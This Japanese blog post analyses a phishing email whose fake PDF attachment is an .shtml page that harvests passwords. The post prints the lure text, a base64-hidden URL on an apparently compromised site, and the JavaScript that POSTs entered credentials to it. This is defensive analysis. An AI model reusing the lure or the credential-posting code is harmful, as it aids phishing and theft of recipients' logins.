ブログ - Official Purchase Order.pdf というタイトルの添付ファイル付きフィッシングメール
Official Purchase Order.pdf というタイトルの添付ファイル付きフィッシングメール
- カテゴリ :
- セキュリティ » スパム・フィッシング
- ブロガー :
- ujpblog 2025/2/12 14:04
ウチは何も商品を売ってないけど,買いたい人が現れた.
引用: PDFとなっているけど.shtmlの拡張子.メーラによっては拡張子が隠れるのかな?
VirusTotalで分析.
FakePDFとなっている.実際,Webブラウザで読み込ませるとこんな感じ.
パスワードでロックされたPDFを装っている.
.SHTMLファイルなので,ファイルを確認.
1ライナーで非常に可読性が悪い.難読化はされてない.
読みやすいように">"と";"で改行するよう整形して,HTTP通信部分を取り出す.
4つのリンクがあったので,確認.
JavaScriptでロックされたPDFを偽装し,その背景は画像サイトのリンクにして発注書を偽装している模様.
パスワードを入れた後の送信先のURLを抽出してみる.
JavaScriptのatob()関数は,テキストをBASE64デコードするものなので,隠蔽されているリクエスト先はデコードすれば出てくる.
該当のURLをWebPluseで分析.
「脅威の危険にさらされたサイト (Compromised Sites)」と出ている.「不正なグループまたは個人による悪意のあるコンテンツや許可されていないコンテンツを使用してハッキングまたは侵害された正当なサイト」なので,乗っ取られて不正なプログラムが設置されたということか.
SHTMLファイルの中には,このログイン時に示されるフィッシングメール受信者のメアドが埋め込まれている.
これによって添付ファイルのハッシュ値が毎回異なる効果も期待され,セキュリティツールをすり抜ける可能性が高まる.
引用:
We are Interested in buying your product
Kindly find the attached Official Purchase Order and arrange to supply.
Thanks,
Best Regards
Official Purchase Manager
御社の製品を購入することに興味があります。
添付の公式発注書をご覧いただき、供給の手配をお願いいたします。
ありがとうございます、
よろしくお願いいたします。
公式購買マネージャー
VirusTotalで分析.
FakePDFとなっている.実際,Webブラウザで読み込ませるとこんな感じ.
パスワードでロックされたPDFを装っている.
.SHTMLファイルなので,ファイルを確認.
1ライナーで非常に可読性が悪い.難読化はされてない.
読みやすいように">"と";"で改行するよう整形して,HTTP通信部分を取り出す.
$ sed -E 's/[>;]/\'$'\n''/g' Order.pdf.shtml |grep http🆑
<meta http-equiv="Content-Type" content="text/html
<link rel="icon" type="image/png" href="https://img.freepik.com/free-icon/pdf_318-187733.jpg"🈁
height:100%}#sub{background-image:url(https://imgur.com/msGEKZ9.png)🈁
<img src='https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRP3UnVP2FtwD-
UIjDdaDEV7gZz2pqcS7QGTJCnXWPUtpJjzD5copD4IOnd98hJzh0BaD0&usqp=CAU'🈁class="img-fluid"
width="80px"
= 2){ window.location = "https://smallpdf.com/file#s=3bad29f0-b7e6-4738-926a-be54c923476b"🈁
$
JavaScriptでロックされたPDFを偽装し,その背景は画像サイトのリンクにして発注書を偽装している模様.
パスワードを入れた後の送信先のURLを抽出してみる.
$ sed -E 's/[>;]/\'$'\n''/g' Order.pdf.shtml |grep url🆑
height:100%}#sub{background-image:url(https://imgur.com/msGEKZ9.png)
var url = atob('aHR0cHM6Ly9raW1hc2EuY29tLm14L3dydmV3enpqb3AvaW5kZXhpb3B4LnBocA==')🈁
//full url goes here </script
n.open("POST",url),n.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),
n.onreadystatechange=function(){4===n.readyState&&(se())}
$該当のURLをWebPluseで分析.
「脅威の危険にさらされたサイト (Compromised Sites)」と出ている.「不正なグループまたは個人による悪意のあるコンテンツや許可されていないコンテンツを使用してハッキングまたは侵害された正当なサイト」なので,乗っ取られて不正なプログラムが設置されたということか.
SHTMLファイルの中には,このログイン時に示されるフィッシングメール受信者のメアドが埋め込まれている.
これによって添付ファイルのハッシュ値が毎回異なる効果も期待され,セキュリティツールをすり抜ける可能性が高まる.
